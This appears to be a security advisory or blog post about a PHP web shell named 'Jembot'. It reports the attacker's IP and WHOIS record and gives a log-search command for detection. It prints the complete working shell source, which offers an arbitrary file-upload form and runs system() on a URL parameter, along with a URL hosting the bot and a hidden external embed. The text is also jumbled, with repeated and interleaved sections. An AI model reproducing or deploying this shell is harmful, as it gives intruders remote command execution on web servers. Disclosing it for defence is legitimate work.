We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:
.php
Attacks coming from IP 187.17.65.242 Brasil
WHOIS:
#egrep -n --color "hell.php" *.log
Source code:
<?phpLocation of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
{
echo "gagal: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "sukses: " . $_FILES["file"]["name"] . "<br />";
echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "mentah: " . $_FILES["file"]["tmp_name"];
}
if (file_exists("" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " wes enek cok. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT>
.php
Attacks coming from IP 187.17.65.242 Brasil
WHOIS:
inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022We strongly recommend to block this ip address and run the following command to detect attacks:
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: [email protected] created: 20031202 changed: 20100106
nic-hdl-br: SEO50 person: Security Office e-mail: [email protected] created: 20021114 changed: 20110830
#egrep -n --color "hell.php" *.log